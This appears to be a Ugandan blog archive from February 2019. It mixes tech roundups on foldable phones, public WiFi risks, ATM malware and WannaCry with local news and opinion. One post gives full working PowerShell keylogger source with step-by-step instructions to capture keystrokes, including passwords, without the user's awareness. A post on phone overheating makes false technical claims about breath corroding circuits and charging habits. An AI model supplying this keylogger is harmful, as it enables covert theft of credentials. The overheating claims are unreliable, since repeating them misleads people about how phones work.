Tuesday, February 26, 2019

Remember the days when text messages and Snake on your Nokia 3310 were two of the most exciting things a phone could manage? We do too. Fast forward 15 years and we have in-display fingerprint scanners,
punch-hole front cameras , bezel free displays and a whole new take on slider and flip phones.
Flip phones were once slim, compact and hinged devices. Now, flip phones have morphed into foldable phones and they are set to be unhinged, in both senses of the word.
With bendable screens, Android support, plenty of potential and huge price tags, here are the devices leading the crazy foldable smartphone trend, from the already announced to the upcoming and rumoured.
Huawei
6.6-inch front, 6.38-inch rear, unfolds into 8-inch OLED tablet
4500mAh battery with 55W fast-charging
Kirin 980 chipset and 5G modem
Leica triple camera
Huawei was the one to steal the show at Mobile World Congress 2019 , unveiling its take on a folding phone in the Mate X. Unlike the Samsung Fold (below), the X has its screen on the exterior fold - presented as a 6.6-inch main screen and elongated 6.38-inch screen on the rear. Unfolded, the two present as an 8-inch tablet form.
It's seamless, with no separation, no kinks or creases - and we think the Mate X is a much smarter implementation of the folding feature idea than Samsung's 'hidden tablet' in the Fold. However, the Huawei might struggle with scratches.
Elsewhere the Mate X offers top-end spec: its got a 4500mAh total battery capacity with fastest-in-class 55W charging (80 per cent in just 30 minutes), the company's top-end Kirin 980 processor and a 5G modem for the fastest possible connectivity. There's no final word on price or release date just yet, though, but Huawei being Huawei we'd expect it to be competitive against Samsung's offering.
Huawei Mate X in pictures
Samsung
7nm 64-bit octa-core processor, 12GB RAM
4.6-inch to 7.3-inch Infinity Flex display
512GB storage
4380mAh battery capacity
The Samsung Galaxy Fold is finally official, following years of rumours. The device was revealed alongside the Galaxy S10 range at Samsung Unpacked 2019 and it will go on sale at the end of April for the US and beginning of May for Europe, with a starting price of €2000.
The Galaxy F foldable smartphone has a 4.6-inch screen that folds out to an 7.3-inch tablet, but unlike the Royole FlexPai (below), it has a more consumer friendly design with a more considered hinge. It features a 7nm Exynos chip, coupled with 12GB of RAM and 512GB of storage. There is no microSD but the device does offer six camera and the software allows for three-app multi-tasking when open on the larger display.
Samsung Galaxy Fold: Everything you need to know
Royole
Qualcomm SD855, 6/8GB RAM
7.8-inch flexible screen, 308ppi
16MP/20MP cameras
134 x 190.3 x 7.6mm (unfolded), 320g
Royole beat everyone to the punch, announcing the first commercially-available smartphone with a flexible display. It's currently only available in China as a developer model but the FlexPai turns from a 7.8-inch tablet to a smartphone by folding in half.
It's got all the power of a typical flagship smartphone but it's a bulky bit of kit when folded and it doesn't fold flat, leaving a nice big air gap next to the non-existent hinge. It also starts at £1209/$1300. There's plenty of future potential though, especially given the screen technology is just millimetres thick.
Royole FlexPai in action
Xiaomi
President of Xiaomi, Lin Bin, tweeted a teaser video of a foldable phone so the trend is on the Chinese company's radar, though it wasn't ready for Mobile World Congress .
The device folds both sides, allowing for a smaller phone unit from the larger 4:3 tablet. The video shows the software adapting accordingly depending on the form factor, but Xiaomi's vice president told us the company is still studying what technologies should be offered.
Currently the device is just an engineering sample, though Bin said if it is liked by enough people, the company would consider developing a consumer version. He asked for name suggests. We are all about Foldy Mcfoldface.

TCL
TCL announced at Mobile World Congress 2019 that it will be entering the foldable smartphone market at some stage, though it doesn't yet have a specific device. Instead, the company showed off a hinge - called DragonHinge - that could feature on various foldable phone designs, as well as wearables.
There was also a prototype device at MWC, which opened and shut like a wallet. The screen was on the inside and while there was no external display, the company also showed a concept with a display on the cover, allowing users to check notifications and messages.
TCL is entering the foldable device game with versatile DragonHinge
LG
LG
Not ruled out foldable device
LG announced the V50 ThinQ at Mobile World Congress 2019 , but it isn't a foldable phone. Instead, the 6.4-inch device has a Dual Screen accessory that allows users to experience two screens together but they can be detached from each other. The Dual Screen comes in the form of a foldable case with a display and it connects to the V50 ThinQ via three pins.
The company hasn't completely ruled out making a foldable phone though. It told us in our pre-MWC briefing that a foldable phone doesn't make business sense just yet but that if things change in the future, it's something it might consider.
LG V50 ThinQ and Dual Screen accessory
OPPO
Oppo
Leaked on Weibo
Like Motorola and LG, Oppo has filed patents for a foldable smartphone. The company's product manager was reported to have said news regarding Oppo's foldable smartphone plans would potentially appear at MWC but not much else was said and nothing appeared at the show.
Instead, images of the device landed on Chinese micro-blogging site Weibo. The phone is clearly a prototype and has a OLED wraparound display on the outside rather than folding internally. Based on the images, one side of the screen has a thicker bezel for cameras and so on.
When the Oppo foldable phone will launch is not yet known but it certainly looks like the OnePlus parent company will launch one at some point.
Sony
6.2-inch, OLED, 4K
Dual rear camera (19MP + 12MP)
Qualcomm SD855
8GB RAM, 128/256/512GB storage
It's long been claimed Sony is also working on a foldable smartphone and several concept videos from Tech Configurations show just how amazing the device could be. With various names speculated, including Xperia Note Flex, it's claimed Sony's foldable device will take things to the next level and also offer a transparent display.
An in-display fingerprint reader, dual rear camera and Qualcomm's Snapdragon 855 chip are all listed specs in the concept leaks. The Sony Xperia folding smartphone is also said to have a polymer joint and a 6.2-inch OLED display with a 4K resolution when folded out.
LENOVO / MOTOROLA
Motorola
Internal and external display
Camera
Fingerprint sensor
Speculation suggests Motorola is quite literally morphing its 15-year old Razr flip phone into a foldable phone, switching the numerical keyboard for a full display that folds when you shut the phone.
It is claimed the Razr lookalike will not only offer a long internal display, but also a secondary screen on the rear, which will presumably show incoming notifications without the device needing to be open. A camera and fingerprint sensor also appear to be present, based on the leaked patent.
Apple







Apple has filed a couple of patents for foldable phones, suggesting the Cupertino company is also working on a device to meet this trend.
According to one patent , the Apple foldable smartphone may use "overlapping hinges" attached to "flexible displays".
Another patent suggests the device could roll rather than fold. Naturally, rumours are very contradictory but it has been said Apple will wait till 2020 to release a foldable smartphone so we might have a little longer to wait yet.

Apple is finally rumoured to be working on sleep tracking technology for its Apple Watch

Apple is finally rumoured to be working on sleep tracking technology for its Apple Watch , according to a Bloomberg report. The company bought Beddit, a company that makes a sleep tracking sensor strip, in May 2017, so sleep tracking has long been a feature expected to come to the Apple smartwatch.
The report suggests people familiar with the matter have said Apple is testing the sleep monitor in several "secret sites" around its Cupertino headquarters, though it is not expected to come to the Apple Watch until 2020.
Sleep tracking is currently available to the Apple Watch through third party apps, but it's not a feature supported natively. It is however, a feature that is lacking from the device, especially with most of
Apple's competition offering it. The latest Samsung Galaxy Watch Active offers four stages of sleep tracking for example, as do Fitbit's latest fitness trackers like the Charge 3.
Those devices offer multiple days of use from a single charge however, certainly in the case of the Fitbit Charge 3 anyway. For sleep tracking to be a viable feature, a longer battery life will be a necessity for the Apple Watch, or at least fast charging support.
The Apple Watch Series 5 is expected to arrive around September 2019, though by the sounds of it, we won't be seeing sleep tracking until the Apple Watch Series 6. Hopefully that timeline will improve though. When it does arrive, we'd expect sleep tracking to play a part in Apple Rings too.

Updf handsover 70 ex m23 rebels to DRC


Monday, February 25, 2019

How to use the public wifi safely

WiFi is a lot like water. It is available almost everywhere and probably should be free. Unfortunately, a lot of times it is not safe to drink free water. Water that is sourced from a stream might be dirty, and unless you have a water purification system, it is not a good idea to drink much of it. Water from the ocean might be too salty. Avoid water from a sewer at all costs.
WiFi can also be unsafe, especially if it is free and public.
The difference between Ethernet and WiFi
When people use Ethernet, safe and secure internet access is much more certain. With a wired Ethernet connection, people must physically go to the source if they want to infiltrate the network. In contrast, a wireless network system means a person merely has to be with in the reach and range of the Wi-Fi to connect. Upon connecting, you are placing your devices into a network that are likely not secure. There are many attacks you are vulnerable to when you log in.
Man in the Middle Attacks
A Man in the Middle Attack is an attack in which an attacks places himself in between point A (your device) and point B (your connection spot). The attacker intercepts the information, effectively eavesdropping. Therefore, it is not wise to log into your bank account, check emails, or view any sensitive information while connected to public WiFi.
Malicious Software and Honeypots.
Within the unprotected network, there are a plethora of opportunities for an attacker to hide Malware. Often, hackers will find vulnerabilities and code in malicious software. Other times, they will set up their own fake WiFi hot-spots. These fake hot-spots impersonate legitimate networks in hopes that someone will connect. From that point on, your device is fair game for Malware.
How can you protect yourself?
First off, one of the safety ways, as we have covered before , is get a Virtual Private Network (VPN). All VPN encrypts whatever activity and sends it out via a separate IP address. In other
to much money, at least make sure to never connect to an unprotected Wifi. Make sure the network requires you to type in a password. Additionally, try to verify that the network is secured and legitimate.


How to create a simple keylogger yourself in windows: – Keylogging is the process of recording the key presses made on a keyboard on to a log. This is often done without the awareness of the user. Keylogging is widely used as a hacking trick as well. Using keylogging, all the keypresses made on a keyboard can be efficiently recorded. This can include passwords, usernames, secret pins, confidential data etc. Keylogging can be used to detect trespassing as well. In this article, a windows framework known as Powershell is used to create a simple keylogger. It consists of a command-line shell and associated scripting language. Powershell is built on the .NET framework and is used widely for various applications.
STEP 1
  • Spread out the Start menu. Type in Windows PowerShell in the search bar. From the search results, open the applications Windows PowerShell and Windows PowerShell ISE as shown in the screenshot.
1search
STEP 2
  • Click on Windows PowerShell icon in the task bar. This will result in the popping up of Windows PowerShell command prompt.
2powerShell
STEP 3
  • Copy the code given below and paste it onto the Windows PowerShell command prompt. To copy or paste, you just need to select the code and right click, in the PowerShell command prompt.
    #requires -Version 2
    function Start-KeyLogger($Path="$env:temp\keylogger.txt") 
    {
      # Signatures for API Calls
      $signatures = @'
    [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] 
    public static extern short GetAsyncKeyState(int virtualKeyCode); 
    [DllImport("user32.dll", CharSet=CharSet.Auto)]
    public static extern int GetKeyboardState(byte[] keystate);
    [DllImport("user32.dll", CharSet=CharSet.Auto)]
    public static extern int MapVirtualKey(uint uCode, int uMapType);
    [DllImport("user32.dll", CharSet=CharSet.Auto)]
    public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
    '@
    
      # load signatures and make members available
      $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
        
      # create output file
      $null = New-Item -Path $Path -ItemType File -Force
    
      try
      {
        Write-Host 'Recording key presses. Press CTRL+C to see results.' -ForegroundColor Red
    
        # create endless loop. When user presses CTRL+C, finally-block
        # executes and shows the collected key presses
        while ($true) {
          Start-Sleep -Milliseconds 40
          
          # scan all ASCII codes above 8
          for ($ascii = 9; $ascii -le 254; $ascii++) {
            # get current key state
            $state = $API::GetAsyncKeyState($ascii)
    
            # is key pressed?
            if ($state -eq -32767) {
              $null = [console]::CapsLock
    
              # translate scan code to real code
              $virtualKey = $API::MapVirtualKey($ascii, 3)
    
              # get keyboard state for virtual keys
              $kbstate = New-Object Byte[] 256
              $checkkbstate = $API::GetKeyboardState($kbstate)
    
              # prepare a StringBuilder to receive input key
              $mychar = New-Object -TypeName System.Text.StringBuilder
    
              # translate virtual key
              $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)
    
              if ($success) 
              {
                # add key to logger file
                [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode) 
              }
            }
          }
        }
      }
      finally
      {
        # open logger file in Notepad
        notepad $Path
      }
    }
    
    # records all key presses until script is aborted by pressing CTRL+C
    # will then open the file with collected key codes
    Start-KeyLogger
    
STEP 4
  • Now the Windows PowerShell will look like the following screenshot.
3copyCode
STEP 5
  • Now open some application and press some keys. I have opened G-Mail as an example.

STEP 6
  • Once you are done with pressing keys, look at the bottom of the code in the Windows PowerShell command prompt. There you will see an instruction Recording key presses. Press CTRL+C to see results. Press CTRL+Cas per the instruction to see the logged keystrokes.
STEP 7
  • Pressing CTRL+C will result in the opening of a notepad file, which has the recorded keystrokes.
5notepad
STEP 8
  • Alternatively, you can open the Windows PowerShell ISE as shown in the first step and copy the code. As next, click on the Play icon to run the script. This will also give the same result.
6PowerShellISE

Museveni is the 12th most economic influencer

President Yoweri Kaguta Museveni has been ranked among the best President’s in the World, according to a New York University and World Bank experts who ranked the President 12 th in terms of influencing economic growth.
The report first released in May 2018 by the World Bank economist Steve Penning’s and New York University Economics Professor William Easterly indicates that Museveni is one of the best leaders with a significant positive impact on their countries economic growth.
The two experts define the best leaders as any leaders for whom estimated leader effect is positive and significant at the 95% level and the worst leader are those with negative and insignificant leader effects.
The findings that were entitled “Shrinking dictators: how much economic growth can we attribute to national leaders” ranked Senior General Than Shwe of Burma as number one for being the most influential leader who steered his country’s economic growth at 3.95% and shrinkage of just 0.71%. He was the head of the State of Burma between 1992 and 2011 as chairman of the State Peace and development Council (SPDC).
“Leadership requires bold initiatives and President Museveni must be credited for this. It requires stringent and well thought out policies to reverse the decline our country was in and revamp the economy. Its not surprising the Museveni has firmly put this country on a steady economic growth,” Stephen Miyingo, the Senior Presidential Advisor on Economic Affairs said of the report.
He said the report provides a third party independent opinion which confirms what the NRM government has been telling Ugandans.
Easterly and Hennings ranked 24 world leaders and President Museveni came in the 12 th position, scoring higher than many powerful leaders globally including the former Prime Minister of Singapore Lee Kuan Yew and Park Chung-hee former President of South Korea between 1963 and 1979.
Museveni’s significant contribution to Uganda’s economic growth is said to be a record 2.42% with a shrinkage of only 0.78% since he came to power in 1986.
The report also established that leaders like Yoweri Museveni and Seretse Khama of Botswana rank higher than Lee Kuan Yew of Singapore partly because they did will in relation to the lower average regional growth in Sub Saharan Africa compared to East and South Asia.
While making is assessment on Museveni contribution, the report highlighted the infrastructure development at its peak now with 5,350km total of paved roads compared to 987km of 1986.
The General quality of lives and standard of living has improved tremendously together with an increase in incomes despite the increase in the population growth.
Other sectors highlighted include the employment sector with a national employment rate reducing from 11% to 8%, access to electricity grid has increased to 22% in 2017 from 14% in 2013 and access to water has also risen from 68% to78% during the same period. Revenue collections per annum has also increased, for instance in 2005/06 the total revenue collected was Shs 2.23 trillion compared to the estimated Shs 20trillion to be collected next financial year.
The report also highlighted the robust peace and security under Museveni that has been credited for the prevailing economic growth, restoration of freedom of speech, press freedom, freedom of worship relative democracy, effective foreign policy, education and tourism.

NIRA is not serious

NIRA as an authority established to oversee the issuance of national identity cards has been a failure not because it doesn't know what to do but the recklessness of its workers and other bodies involved in the national id process.
It is unbecoming as to how alot of foreigners easily got and get our national id yet the valid citzens take more time with alot of inconviniences in getting the national id.when i write this,i know alot of you out there think that am simply writting,but the real issue is that the whole NIRA processes in getting National id are getting nuisance and too much inconviniencing with alot of bribery at some levels.
Its true that foreigners have been crossing border to get national ids and hiw they apply for them is through bribery.In districts close to borders,the DISOs,GISOs and the LC1s usually get bribes to sign for these foreigners,however it shoukd be noted that RDCs are not involved in this nonsensical bribery.They are allegations that in the past mass processing of the national ID,some of the foreigners would pay too much money to be given a go a head in the process and they would get them more easily and faster than the ugandan citzens.
Its absurd that many people who are sickly and bed ridden,cripples plus many without ability to reach processing centres are up to now without IDs.NIRA must with an immediate effect put up a specialized program to avail these peoople with the IDs.
There should be "edition"of information given and included on these IDs especially the address and phone numbers.Imagine some providing a phone number not registered in the names that arent corresponding with those on the IDs.
As i have talked of foreigners getting our IDs,its very dangerous for a foreigner to get our National ID.These idiots who accept such bribes cannot realise it.For example,such people may use such apparently wright identification to join the police force,national army or any sensitive office with the main purpose of carrying on espionage. I call upon the mighty Police force and Mighty UPDF to always take excessive and thorough scrutiny of some of these applicants.lf some of these idiots who take bribes are not patriotic, we are patriotic, we love our country and anyone to receive any national document must legally apply for it.
For God and my Country.

What Burundi's ambassador to Uganda said about tension with Rwanda.

Burundian Ambassador to Uganda Jean Bosco Barege has ruled out the possibility of a “direct military confrontation” with Rwanda as tension between the two countries mounts, but quickly warned Kigali risks being attacked by several armed movements in the region if the government of President kagame makes serious miscalculations.

Bad Black for questioning at CID office

Kampala socialite Shanita Namuyimbwa, popularly known as Bad Black has appeared at the Police Directorate of Criminal Investigations (CID) for questioning over a video she posted online in which she makes serious allegations about a senior government official.
She posted the video on her Facebook page seven months ago, although police have just picked interest to inquire into the claims.
Bad Black on Monday appeared at CID headquarters in Kubuli, Kampala with her lawyers Julius Galisonga and Sam Muyizzi.
CID spokesman SP Vincent Ssekatte said she was supposed to appear on Wednesday (February 27) but she decided to come today.
"We have taken her to the officers for interrogation," he said.
The Force did not say who the complainant is in the case, but the local celebrity likely breached the Computer Misuse Act, according to detectives.
Mr Joseph Obwona, the deputy CID director, in a February 20 summons ordered Ms Namuyimbwa to report to CID headquarters without fail.
“We are investigating a case of offensive communication and criminal libel. You are, therefore, in pursuance of the provisions of Section 27A of the Police Act (as amended) required to report before acting Commissioner of Police [in charge of media department] at CID headquarters…without fail,” he wrote.
In the video, she is alleged to have hurled expletives at the senior official.
Bad Black made the statement as she was protesting the continued detention of Kyadondo East Member of Parliament, Mr Robert Kyagulanyi, alias Bobi Wine, who was arrested and taken into military custody last August for allegedly stoning President Museveni’s car in Arua.
She later used social media to apologise to the adversely named official and retracted the statements.
Social media misuse charged
Police have lately intensified crackdown on social media users under the Computer Misuse Act, questioning or arresting as many as five in the past year, among them remanded former Makerere University researcher, Dr Stella Nyanzi and Mr Mulangira Hope Kaweesa, a Democratic Party supporter.
According to Section 25 of the Computer Misuse Act 2011 on offensive communication, “Any person who wilfully and repeatedly uses electronic communication to disturb or attempts to disturb the peace, quiet or right of privacy of any person with no purpose of legitimate communication whether or not a conversation ensues commits a misdemeanour and is liable on conviction to a fine not exceeding twenty four currency points or imprisonment not exceeding one year or both.”

Police's say on kyaligonza


The Police yesterday, 24/02/2019, acknowledged apologies from its Sister Security Agency, the UPDF over the manner in which our officer, Sgt Namaganda Esther was treated by its officers while on official duty.
The incident that was captured on video, started when the driver of motor vehicle reg. no. 18CDMI who was heading from Kampala – Mukono, wrongfully made a U-turn in the middle of the road at Seeta junction; and was stopped by the traffic officer. This prompted, two body guards to the Ugandan Ambassador to Burundi, Major General (rtd) Matayo Kyaligonza, to jump out of the car and angrily confront our officer, including assault after she attempted to stop them from making the U-turn.
We want to strongly condemn such acts of brutality upon our officers, and do further congratulate our officer on the degree of patience and restraint exhibited. We are observing her treatment and speedy recovery from the injuries and trauma suffered from the incident. This is one example of the risks all police officers face as they work to protect the citizens they serve.
The Police was created two task teams to pursue the matter, which include; the KMP Traffic Commander who will investigate the conduct of the driver, for inconsiderate use of the road; and another team under the CID Commander KMP to investigate the changes of assault and wilful obstruction of an officer on official duty. The team is also investigating an additional complaint of assault from a UBC Journalist, Peter Otai, who was allegedly assaulted while capturing the incident on video.
The task teams will jointly coordinate with the Chieftaincy of Military Intelligence and obtain statements from the two body guards, already in military custody namely: RA/221607 L/CPL Bushindiki Peter and RA/230927 Pte Okurut John Robert.
The public must know that the military charge against them has criminal consequences, reason why we are working with the CMI to bridge the gap and explore the opportunity of charging the suspects on both criminal charges and court martial, over the same behaviour.
As a matter of protocol, the team will through the police leadership cause for the summoning of H.E. The Ambassador Major General (rtd) Matayo Kyaligonza, through the Ministry of Internal Affairs to the Ministry of Foreign Affairs on probable charges of assault and wrongful obstruction of an officer on duty.
You will be updated progressively.
POLICE INCREASES VISIBILITY IN NAPAK DISTRICT
The Police and Sister Security Agencies are actively monitoring the security situation in Napak district, following attempts to hold violent protests, over the pronouncement of the Ministry of Local Government, Hon. Col. Tom Butime, which confirmed the boundary line, between Napak and Katakwi Districts at Iriri village.
The pronouncement on the 19 February, 2019, was made as per the findings of the independent survey conducted in 2016. The Napak Community felt disappointed over the fact that the demarcation curved out Alekilek village, which is dominated by the Karimojong and is located 3kms from the new borderline into Katakwi district.
On the 23 February, 2019, the Police dispersed a crowd of about 200 youths that had been mobilised to march in protest from Iriri in Napak district, a distance of 6 kms to Alekilek village in Katakwi district. They were stopped and dispersed after they attempted to lynch the Chairman LCV Napak, Lamonyang Joseph SONIK as well promote breach of peace in the area. There were no injuries.
The situation has since remained calm and peaceful. And we want to encourage the aggrieved party to seek redress through lawful means.
CP Enanga Fred
Police Spokesperson
25 February 2019

Sunday, February 24, 2019

WHY YOUR PHONE OVER HEATS AND DRAINS BATTERY VERY FAST

WHY YOUR PHONE OVER HEATS AND DRAINS BATTERY VERY FAST:
Faulty capacitors and resistors are the main reason for this problem.. as all electronic experts have to agree ,that capacitors do BLOCK direct current as they allow alternating current to pass,meaning that capacitors do smoothen the output from a power supply. thus when capacitors are faulty high levels of direct current will flow via the PCD thus leading to over heating! again,we know that capacitors store current ,when current flows to the metal plate via the dielectric forming an electromagnetic field where -ve and +ve electrons are absorbed and stored at the two metallic plates to be released later thus if capacitors get faulty alot of current will directly distributed and thus draining the battery fast! resistor limit flowage of current in high levels and reduce voltage to a desired level,e.g if a battery has 4 volts and a chip need 2 volts,2 resistors of equal resistance placed in a series will be needed to half the voltage to prevent heating.
Why and how do capacitors and resistors get faulty?
Its absurd that here in africa we almost get fake phones from shops,phone brands originating from china have taken over the whole of africa.Techno,airtel are soon getting up to 93% of the total number of phones held here in africa.Am not saying that most phones made in china are fake but i say "phones from china shipped to africa are all fake in one way or the other"
.1- These fake phones bought at cheap price are always made of cheap materials and involve cheap technology in their manufucture meaning that at and in any cost will always face alot of technical problems.capacitors and resistors in these phones are of poor quality and cannot hold or relay electric currents for long time that's why a chinese phone that was good at reserving battery may get worse as it get to one year in use.Weak circuit boards on which the capacitors and resistors are not firmly fixed such that when it falls down they usually get peeled off or loosely held on it.If one is not used to phones its very hard to detect such faults.Again,these phones have poorly designed circuit patterns that may lead to shortcircuits on the PCB.All these are responsible for over heating and battery drain.
2.Climate conditions and poor maintenance of phones! In africa people use phones for lighting where they put phones in the mouth and you know th torch of a phone is on top and usually its the charging system area that's directly exposed or put inside the mouth.As one exhales,its carbondioxide which foms a milk cloud and gets on the PCB and the resistors.when carbon dioxide mixes with saliva,moisture and other air components, they form weak carbonic acid that erodes the capacitors and the resistors. If you take a look inside your phone charging system or on resistors if you open it.you see bluish or greenish substances,those are oxides of the corroded metal from which the resistors are made.These corruded material bridge circuitry patterns or bridge resistor that are close and lead to short circuiting you literary call burning.You must put in mind that the resistors and capacitor that first does the regulations of current flow are near the charging system.Again,most phones when hit by rainfall andas you know that rain water is weak carbonic acid and highl corrusive as explained above, is also another cause of faulty capacitors and resistors.
3.Poor charging mentality and poor chargers: Phones have a limited time over which they must spend on charge.when its new,you owe to charge it for atleat 16 hours to make the circuit board used to electric current.How many do that here in africa.Some people have to leave phones to charger from evening up to morning.its even not allowed not to recieve call when charging or one should put the phone off when charging.The activities on phone use current and if we use it when its on charger it can lead to short circuit.many of us simply use chargers because they look to fit in the charging ports of our phones.we should know that different chargers have different power input and different phones hace different power the can take in through their charging systems and PCB.if you use a charger of high power in put on a phone of low power receipt, then you end up burning parts of the circuit board.....

ATM hacking getting easy and an inreased trend of cyber robbery

As long as there are ATMs, hackers will be there to drain them of money. Although ATM-targeted “jackpotting” malware—which forces machines to spit out cash—has been on the rise for several years, a recent variation of the scheme takes that concept literally, turning the machine’s interface into something like a slot machine. One that pays out every time.
As detailed by Kaspersky Lab, so-called WinPot malware afflicts what the security researchers describe only as a “popular” ATM brand. To install WinPot, a hacker needs either physical or network access to a machine; if you cut a hole in the right spot, it's easy enough to plug into a serial port. Once activated, the malware replaces the ATM's standard display with four buttons labeled “SPIN”—one for each cassette, the cash-dispensing containers within an ATM. Below each of those buttons, it shows the number of bank notes within each given cassette, as well as the total values. Tap SPIN, and out comes the money. Tap STOP, and well, you know. (But at that point, ATM cyberthief, why would you?)
“These people do have a sense of humor and some spare time.”
Konstantin Zykov, Kaspersky Lab
Kaspersky started tracking the WinPot family of malware back in March of last year, and in that time has seen a few technical versions on the theme. In fact, WinPot appears to be something of a variation in its own right, inspired by a popular ATM malware dating back to 2016 called Cutlet Maker. Cutlet Maker also displayed detailed information about the contents of its victim ATMs, though rather than the slot motif it used an image of a stereotypical chef giving a wink and the hand gesture for “OK.”
The similarities are a feature, not a bug. “The latest versions of ‘cashout’ ATM software contain only small improvements compared with previous generations,” says Konstantin Zykov, senior security researcher at Kaspersky Lab. “These improvements allow the criminals to automate the jackpotting process because time is critical for them.”
That also goes some way to explaining the absurdist bent ATM hackers have embraced of late, an atypical trait in a field devoted to secrecy and crime. ATM malware is fundamentally uncomplicated and battle-tested, giving its proprietors space to add some creative flair. The whimsical tilt in WinPot and Cutlet Maker “is not usually found in other kinds of malware,” Zykov adds. “These people do have a sense of humor and some spare time.”
After all, ATMs at their core are computers. Not only that, they're computers that often run outdated, even unsupported versions of Windows. The primary barrier to entry is that most of these efforts require physical access to machine, which is one reason why ATM malware hasn’t become more popular in the US, with its relatively pronounced law-enforcement presence. Many ATM hackers deploy so-called money mules, people who assume all the risk of actually extracting money from the device in exchange for a piece of the action.
But WinPot and Cutlet Maker share an even more important trait than waggery: Both have been available for sale on the dark web. Kaspersky found that one could purchase the latest version of WinPot for as little as $500. That’s unusual for ATM hackers, who have historically kept their work closely guarded.
“More recently, with malware such as Cutlet Maker and WinPot, we see this attack tool is now commercially for sale for a relatively small amount of money,” says Numaan Huq, senior threat researcher with Trend Micro Research, which teamed up with Europol in 2016 for a comprehensive look at the state of ATM hacking. “We expect to see an increase in groups targeting ATM machines as a result.”
WinPot and Cutlet Maker represent only a slice of the ATM malware market. Ploutus and its variants have haunted cash machines since 2013, and can force an ATM to spit out thousands of dollars in mere minutes. In some cases, all a hacker needed to do was send a text message to a compromised device to make an illicit withdrawal. Typukin Virus, popular in Russia, only responds to commands during specific windows of time on Sunday and Monday nights, to minimize the chances of being found. Prilex appears to have been homegrown in Brazil, and runs rampant there. It goes on and on.
Stopping this sort of malware is relatively easy; manufacturers can create a whitelist of approved software that the ATM can run, blocking anything else. Device control software also can prevent unknown devices—like a malware-carrying USB stick—from connecting in the first place. Then again, think of the last bodega ATM you used, and how long it's been since it got any kind of updates.
So expect ATM hacking to only get more popular—and more farcical. At this point, it's literally fun and games. “Criminals are just having fun,” says Zykov. “We can only speculate that since the malware itself is not that complicated they have time to spend on these ‘fun’ features.”



Take a look at the story down as run by the observer newspaper on 14/09/2017

Two people have been arrested for allegedly hacking into the accounts systems of Centenary bank and transferring millions of shillings.
The two identified as Denis Etumu and Shalih Ajuna were picked from different areas of Kampala after being trailed by intelligence personnel from Central Police Station (CPS) Kampala.
Etumu was the first to be arrested around Mini Price complex in downtown Kampala. He was thereafter used to set up Ajuna who was also arrested.
According to the Kampala Metropolitan deputy police spokesperson Luke Owoyesigire, Centenary bank officials had earlier filed a complaint indicating that the Automated Teller Machines (ATMs) had been hacked by unknown personnel.
"When they complained that someone had interfered with their ATMs especially the one at Mini Price, we began investigations to establish who was behind the fraud, " Owoyesigire told URN.
Police initially retrieved CCTV camera footage around Mini Price which they used to single out Etumu. Preliminary investigations indicate that the suspects had set the ATMs in a way that they could easily retrieve details from various accounts.
Among the accounts which were hacked and money transferred account number 302007**** belonging to Prossy Nabukenya from which Shs 510,000 was transferred, 32007**** belonging to Proscovia Nalwayeso from which Shs 2 million was transferred and 320156**** belonging to Eva Mukasini from which Shs 650,000 was transferred among many others.
Detectives together with Centenary bank officials are still in the process of compiling all complaints falling under the same racket of fraudsters as well as tracing where exactly the money was transferred to.
Personnel from the police Cyber Crime Unit have also been deployed to help handle the case. Attempts to get a comment from Centenary bank were futile as none of their officials was willing to comment on the case.
The two suspects are also being tentatively charged with impersonation following recovery of two warrant cards of the Uganda People's Defence Forces (UPDF) believed to have been forged. The cards identify Etumu and Ajuna as soldiers at the rank of Captain. The warrant cards have been sent to the UPDF headquarters for verification.

Cyber security getting more important than ever

The age of digitization has led to many significant changes, both in our day-to-day lives and larger scale operations. One such example is the nature of terrorism. In the last decade or so, a new wave of terror attacks have surfaced — namely cyber-terrorism and cyber-warfare. 2017 saw one of the biggest cyber threats ever, in the form of malware built off a worm called “WannaCry.” Through a phishing scam, the malware managed to infect computers and lock systems down. This scam demanded $300 in bitcoins to get users back into their own files and devices.
The attack hit over 200,000 computers in 150 countries, including the United States, Russia, Britain, Spain, India, Taiwan, Ukraine, and more. Specifically, the targets included universities, the Russian Interior Ministry, FedEx, railway systems, and more. One of the worst hit targets was Britain’s National Health Services. Because hospitals, ambulance companies, and doctors’ offices were hit, outpatient services had to be canceled and surgeries had to be rescheduled.
Large Scale Attacks
With major disruptions caused internationally, the “WannaCry” attack is undoubtedly one of the most damaging cyber threats the world has experienced. But what is it that makes such large-scale attacks possible? In an article on The Week , author John Spross claims that the process of globalization is one of the culprits. This is because globalization rests on a foundation of worldwide interconnections. Therefore, this creates a world where telecommunications allow us to connect easily. This digitally connected world, in turn, is vulnerable to attacks like “WannaCry.”
Later in 2017, the United States government took a rare step and attributed “WannaCry” to North Korean backed hackers. In a broader sense, cyber threats like “WannaCry” have exposed major systemic risks, showing the potential for the rising threat of cyber terrorism. Spross, in his article on The Week, asks the very relevant question, “If such attacks continue — and plenty of experts say they will — how will globalization adapt? Can it even survive?” Looking back at global cyber threats such as these, some alarming emerging trends are beginning to take shape.
The Consequences of Cyber Threats are Dire
In the modern age, companies are very dependent on their data and systems. Therefore, any interference with their processes can wreak havoc. From affecting market capitalization and endangering executive leadership, to major losses in sales and diminished profits, cyber-crime has the potential to destabilize major enterprises in a matter of a few hours. Additionally, cyber-criminals are becoming more bold. For example, many have shifted their targets from the pockets of consumers to global economic giants.
Today, this changing trend in the nature of cyber threats is of much concern to the banking industry. After all, large-scale attacks can cause a “run” on the global banking system in a worst-case scenario. A digital blackout following a cyber-attack makes it difficult to carry out even normal business transactions.
While advanced cybersecurity is a must, businesses must also employ basic (and often overlooked) security measures. Some of these measure include installing anti-viruses and utilizing online signatures . These methods will help ensure that your business does not come to a complete standstill in the wake of cyber threats. Hopefully, basic communications from personal devices can carry on, making it easier to take immediate restrictive action.
Cyber-threats Are Becoming Increasingly Sophisticated
Hackers continue to increase in sophistication, and have access to very advanced hacking tools through a thriving black market. Cyber threats are very well funded, thoroughly coordinated, and sometimes even sponsored by entire nations. Even a company like Deloitte, known to be the world’s largest cybersecurity consultant, is vulnerable to attack, as shown by their security breach in October 2017.
In this volatile cyberworld, it is almost safer for businesses to assume that they will inevitably be breached at some point in time. With this assumption, they are then forced to implement adequate controls and
